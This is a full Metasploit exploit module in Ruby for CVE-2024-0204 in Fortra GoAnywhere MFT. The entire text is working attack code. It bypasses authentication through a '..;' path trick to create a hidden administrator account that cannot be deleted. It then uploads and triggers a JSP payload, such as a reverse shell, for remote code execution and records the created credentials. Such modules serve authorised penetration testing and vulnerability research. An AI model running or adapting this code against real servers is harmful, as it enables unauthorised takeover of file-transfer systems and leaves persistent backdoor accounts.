Fortra GoAnywhere MFT Unauthenticated Remote Code Execution

`##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
class MetasploitModule < Msf::Exploit::Remote  
Rank = ExcellentRanking  
  
include Msf::Exploit::Remote::HttpClient  
prepend Msf::Exploit::Remote::AutoCheck  
include Msf::Exploit::FileDropper  
include Msf::Auxiliary::Report  
  
def initialize(info = {})  
super(  
update_info(  
info,  
'Name' => 'Fortra GoAnywhere MFT Unauthenticated Remote Code Execution',  
'Description' => %q{  
This module exploits a vulnerability in Fortra GoAnywhere MFT that allows an unauthenticated attacker to  
create a new administrator account. This can be leveraged to upload a JSP payload and achieve RCE. GoAnywhere  
MFT versions 6.x from 6.0.1, and 7.x before 7.4.1 are vulnerable.  
},  
'License' => MSF_LICENSE,  
'Author' => [  
'sfewer-r7', # MSF RCE Exploit  
'James Horseman', # Original auth bypass PoC/Analysis  
'Zach Hanley' # Original auth bypass PoC/Analysis  
],  
'References' => [  
['CVE', '2024-0204'],  
['URL', 'https://www.fortra.com/security/advisory/fi-2024-001'], # Vendor Advisory  
['URL', 'https://www.horizon3.ai/cve-2024-0204-fortra-goanywhere-mft-authentication-bypass-deep-dive/']  
],  
'DisclosureDate' => '2024-01-22',  
'Platform' => %w[linux win],  
'Arch' => [ARCH_JAVA],  
'Privileged' => true, # Could be 'NT AUTHORITY\SYSTEM' on Windows, or a non-root user 'gamft' on Linux.  
'Targets' => [  
[  
# Tested on GoAnywhere 7.4.0 with the payload java/jsp_shell_reverse_tcp  
'Automatic', {}  
],  
[  
'Linux',  
{  
'Platform' => 'linux',  
'GOANYWHERE_INSTALL_PATH' => '/opt/HelpSystems/GoAnywhere'  
}  
],  
[  
'Windows',  
{  
'Platform' => 'win',  
'GOANYWHERE_INSTALL_PATH' => 'C:\\Program Files\\Fortra\\GoAnywhere\\'  
},  
],  
],  
'DefaultOptions' => {  
'RPORT' => 8001,  
'SSL' => true  
},  
'DefaultTarget' => 0,  
'Notes' => {  
'Stability' => [CRASH_SAFE],  
'Reliability' => [REPEATABLE_SESSION],  
'SideEffects' => [  
IOC_IN_LOGS,  
# A new admin account is created, which the exploit can't destroy.  
CONFIG_CHANGES,  
# The upload may leave payload artifacts if the FileDropper mixins cleanup handlers cannot delete them.  
ARTIFACTS_ON_DISK  
]  
}  
)  
)  
  
register_options(  
[  
OptString.new('TARGETURI', [true, 'The base path to the web application', '/goanywhere/']),  
]  
)  
end  
  
def check  
# We can query an undocumented unauthenticated REST API endpoint and pull the version number.  
res = send_request_cgi(  
'method' => 'GET',  
'uri' => normalize_uri(target_uri.path, '/rest/gacmd/v1/system')  
)  
  
return CheckCode::Unknown('Connection failed') unless res  
  
return CheckCode::Unknown("Received unexpected HTTP status code: #{res.code}.") unless res.code == 200  
  
json_data = res.get_json_document  
  
product = json_data.dig('data', 'product')  
  
version = json_data.dig('data', 'version')  
  
return CheckCode::Unknown('No version information in response') if product.nil? || version.nil?  
  
# As per the Fortra advisory, the following version are affected:  
# * Fortra GoAnywhere MFT 6.x from 6.0.1  
# * Fortra GoAnywhere MFT 7.x before 7.4.1  
# This seems to imply version 6.0.1 through to 7.4.0 (inclusive) are vulnerable.  
if Rex::Version.new(version).between?(Rex::Version.new('6.0.1'), Rex::Version.new('7.4.0'))  
return CheckCode::Appears("#{product} #{version}")  
end  
  
Exploit::CheckCode::Safe("#{product} #{version}")  
end  
  
def exploit  
# CVE-2024-0204 allows an unauthenticated attacker to create a new administrator account on the target system. So  
# we generate the username/password pair we want to use.  
# Note: We cannot delete the administrator account that we create.  
admin_username = Rex::Text.rand_text_alpha_lower(8)  
admin_password = Rex::Text.rand_text_alphanumeric(16)  
  
# By using a double dot path segment with a semicolon in it, we can bypass the servers attempts to block access to  
# the /wizard/InitialAccountSetup.xhtml endpoint that allows new admin account creation. As we leverage a double  
# dot path segment, we need a directory to navigate down from, there are many available on the target so we pick  
# a random one that we know works.  
path_segments = %w[styles fonts auth help]  
  
path_segment = path_segments.sample  
  
# This is CVE-2024-0204...  
initialaccountsetup_endpoint = "/#{path_segment}/..;/wizard/InitialAccountSetup.xhtml"  
  
res = send_request_cgi(  
'method' => 'POST',  
'uri' => normalize_uri(target_uri.path, initialaccountsetup_endpoint),  
'keep_cookies' => true,  
'vars_post' => {  
'javax.faces.ViewState' => get_viewstate(initialaccountsetup_endpoint),  
'j_id_u:creteAdminGrid:username' => admin_username,  
'j_id_u:creteAdminGrid:password' => admin_password,  
'j_id_u:creteAdminGrid:password_hinput' => admin_password,  
'j_id_u:creteAdminGrid:confirmPassword' => admin_password,  
'j_id_u:creteAdminGrid:confirmPassword_hinput' => admin_password,  
'j_id_u:creteAdminGrid:submitButton' => '',  
'createAdminForm_SUBMIT' => 1  
}  
)  
  
# The method com.linoma.ga.ui.admin.users.InitialAccountSetupForm.InitialAccountSetupForm.submit will call method  
# loginNewAdminUser and update our current session, so we dont need to manually login.  
unless res&.code == 302 && res.headers['Location'] == normalize_uri(target_uri.path, 'Dashboard.xhtml')  
fail_with(Failure::UnexpectedReply, "Unexpected reply 1 from #{initialaccountsetup_endpoint}")  
end  
  
print_status("Created account: #{admin_username}:#{admin_password}. Note: This account will not be deleted by the module.")  
  
store_credentials(admin_username, admin_password)  
  
# Automatic targeting will detect the OS and product installation directory, by querying the About.xhtml page.  
if target.name == 'Automatic'  
res = send_request_cgi(  
'method' => 'GET',  
'uri' => normalize_uri(target_uri.path, '/help/About.xhtml'),  
'keep_cookies' => true  
)  
  
unless res&.code == 200  
fail_with(Failure::UnexpectedReply, 'Unexpected reply 2 from About.xhtml')  
end  
  
# The OS name could be something like "Linux" or "Windows Server 2022". Under the hood, GoAnywhere is using  
# the Java system property "os.name".  
os_match = res.body.match(%r{<span id="AboutForm:\S+:OSName">(.+)</span>})  
unless os_match  
fail_with(Failure::UnexpectedReply, 'Did not locate OSName in About.xhtml')  
end  
  
# To perform the JSP payload upload, we need to know the product installation path.  
install_match = res.body.match(%r{<span id="AboutForm:\S+:goAnywhereHome">(.+)</span>})  
unless install_match  
fail_with(Failure::UnexpectedReply, 'Did not locate goAnywhereHome in About.xhtml')  
end  
  
# Find the Metasploit target (Linux/Windows) via a substring of the OS name we get back from GoAnywhere.  
found_target = targets.find do |t|  
os_match[1].downcase.include? t.name.downcase  
end  
  
unless found_target  
fail_with(Failure::NoTarget, "Unable to select an automatic target for '#{os_match[1]}'")  
end  
  
# Dup the target we found, as we patch in the GOANYWHERE_INSTALL_PATH below.  
detected_target = found_target.dup  
  
detected_target.opts['GOANYWHERE_INSTALL_PATH'] = install_match[1]  
  
print_status("Automatic targeting, detected OS: #{detected_target.name}")  
print_status("Automatic targeting, detected install path: #{detected_target['GOANYWHERE_INSTALL_PATH']}")  
else  
detected_target = target  
end  
  
# We are going to upload a JSP payload via the FileManager interface. We first have to get the FileManager, then  
# change to the directory we want to upload to, then upload the file.  
  
path_separator = detected_target['Platform'] == 'win' ? '\\' : '/'  
  
# We drop the JSP payload to a location such as: /opt/HelpSystems/GoAnywhere/adminroot/PAYLOAD_NAME.jsp  
adminroot_path = detected_target['GOANYWHERE_INSTALL_PATH']  
adminroot_path += path_separator unless adminroot_path.end_with? path_separator  
adminroot_path += 'adminroot'  
adminroot_path += path_separator  
  
viewstate = get_viewstate('/tools/filemanager/FileManager.xhtml')  
  
res = send_request_cgi(  
'method' => 'POST',  
'uri' => normalize_uri(target_uri.path, '/tools/filemanager/FileManager.xhtml'),  
'keep_cookies' => true,  
'vars_post' => {  
'javax.faces.ViewState' => viewstate,  
'j_id_4u:j_id_4v:newPath_focus' => '',  
'j_id_4u:j_id_4v:newPath_input' => '/',  
'j_id_4u:j_id_4v:newPath_editableInput' => adminroot_path,  
'j_id_4u:j_id_4v:NewPathButton' => '',  
'j_id_4u_SUBMIT' => 1  
}  
)  
  
unless res&.code == 200  
fail_with(Failure::UnexpectedReply, 'Unexpected reply 4 from FileManager.xhtml')  
end  
  
# We require a regID value form the page to upload a file, so we pull that out here.  
vs_input = res.get_html_document.at('input[name="reqId"]')  
  
unless vs_input&.key? 'value'  
fail_with(Failure::UnexpectedReply, 'Did not locate reqId in reply 4 from FileManager.xhtml')  
end  
  
request_id = vs_input['value']  
  
res = send_request_cgi(  
'method' => 'POST',  
'uri' => normalize_uri(target_uri.path, '/tools/filemanager/FileManager.xhtml'),  
'keep_cookies' => true,  
'vars_post' => {  
'javax.faces.ViewState' => viewstate,  
'javax.faces.partial.ajax' => 'true',  
'javax.faces.source' => 'uploadID',  
'javax.faces.partial.execute' => 'uploadID',  
'javax.faces.partial.render' => '@none',  
'uploadID' => 'uploadID',  
'uploadID_sessionCheck' => 'true',  
'reqId' => request_id,  
'whenFileExists_focus' => '',  
'whenFileExists_input' => 'rename',  
'uploaderType' => 'filemanager',  
'j_id_4i_SUBMIT' => 1  
}  
)  
  
unless res&.code == 200  
fail_with(Failure::UnexpectedReply, 'Unexpected reply 5 from FileManager.xhtml')  
end  
  
jsp_filename = Rex::Text.rand_text_alphanumeric(8) + '.jsp'  
  
message = Rex::MIME::Message.new  
  
message.add_part(request_id, nil, nil, 'form-data; name="reqId"')  
message.add_part('', nil, nil, 'form-data; name="whenFileExists_focus"')  
message.add_part('rename', nil, nil, 'form-data; name="whenFileExists_input"')  
message.add_part('filemanager', nil, nil, 'form-data; name="uploaderType"')  
message.add_part('1', nil, nil, 'form-data; name="j_id_4i_SUBMIT"')  
message.add_part(viewstate, nil, nil, 'form-data; name="javax.faces.ViewState"')  
message.add_part('true', nil, nil, 'form-data; name="javax.faces.partial.ajax"')  
message.add_part('uploadID', nil, nil, 'form-data; name="javax.faces.partial.execute"')  
message.add_part('uploadID', nil, nil, 'form-data; name="javax.faces.source"')  
message.add_part('1', nil, nil, 'form-data; name="uniqueFileUploadId"')  
message.add_part(payload.encoded, 'text/plain', nil, "form-data; name=\"uploadID\"; filename=\"#{jsp_filename}\"")  
  
# We can now upload our payload...  
res = send_request_cgi(  
'method' => 'POST',  
'uri' => normalize_uri(target_uri.path, '/tools/filemanager/FileManager.xhtml'),  
'keep_cookies' => true,  
'ctype' => 'multipart/form-data; boundary=' + message.bound,  
'data' => message.to_s  
)  
  
unless res&.code == 200  
fail_with(Failure::UnexpectedReply, 'Unexpected reply 6 from FileManager.xhtml')  
end  
  
# Register our payload so it is deleted when the session is created.  
  
jsp_filepath = adminroot_path + jsp_filename  
  
print_status("Dropped payload: #{jsp_filepath}")  
  
# We are using the FileDropper mixin to automatically delete this file after a session has been created.  
register_file_for_cleanup(jsp_filepath)  
  
# A copy of the files this user uploads is left here:  
# /opt/HelpSystems/GoAnywhere/userdata/documents/ADMIN_USERNAME/PAYLOAD_NAME.jsp  
# We register these to be deleted, but they appear to be locked, preventing deleting.  
userdoc_path = detected_target['GOANYWHERE_INSTALL_PATH']  
userdoc_path += path_separator unless userdoc_path.end_with? path_separator  
userdoc_path += 'userdata'  
userdoc_path += path_separator  
userdoc_path += 'documents'  
userdoc_path += path_separator  
userdoc_path += admin_username  
userdoc_path += path_separator  
  
register_file_for_cleanup(userdoc_path + jsp_filename)  
  
register_dir_for_cleanup(userdoc_path)  
  
# Finally, trigger our payload via a GET request...  
send_request_cgi(  
'method' => 'GET',  
'uri' => normalize_uri(target_uri.path, jsp_filename)  
)  
  
# NOTE: it is not possible to delete the user account we created as we cant delete ourself either via the web  
# interface or REST API.  
end  
  
# Helper method to pull out a viewstate identifier from a requests HTML response.  
def get_viewstate(endpoint)  
res = send_request_cgi(  
'method' => 'GET',  
'uri' => normalize_uri(target_uri.path, endpoint),  
'keep_cookies' => true  
)  
  
unless res&.code == 200  
fail_with(Failure::UnexpectedReply, "Unexpected reply during get_viewstate via '#{endpoint}'.")  
end  
  
vs_input = res.get_html_document.at('input[name="javax.faces.ViewState"]')  
  
unless vs_input&.key? 'value'  
fail_with(Failure::UnexpectedReply, "Did not locate ViewState during get_viewstate via '#{endpoint}'.")  
end  
  
vs_input['value']  
end  
  
def store_credentials(username, password)  
service_data = {  
address: datastore['RHOST'],  
port: datastore['RPORT'],  
service_name: 'GoAnywhere MFT Admin Interface',  
protocol: 'tcp',  
workspace_id: myworkspace_id  
}  
  
credential_data = {  
origin_type: :service,  
module_fullname: fullname,  
username: username,  
private_data: password,  
private_type: :password  
}.merge(service_data)  
  
credential_core = create_credential(credential_data)  
  
login_data = {  
core: credential_core,  
last_attempted_at: DateTime.now,  
status: Metasploit::Model::Login::Status::SUCCESSFUL  
}.merge(service_data)  
  
create_credential_login(login_data)  
end  
end  
`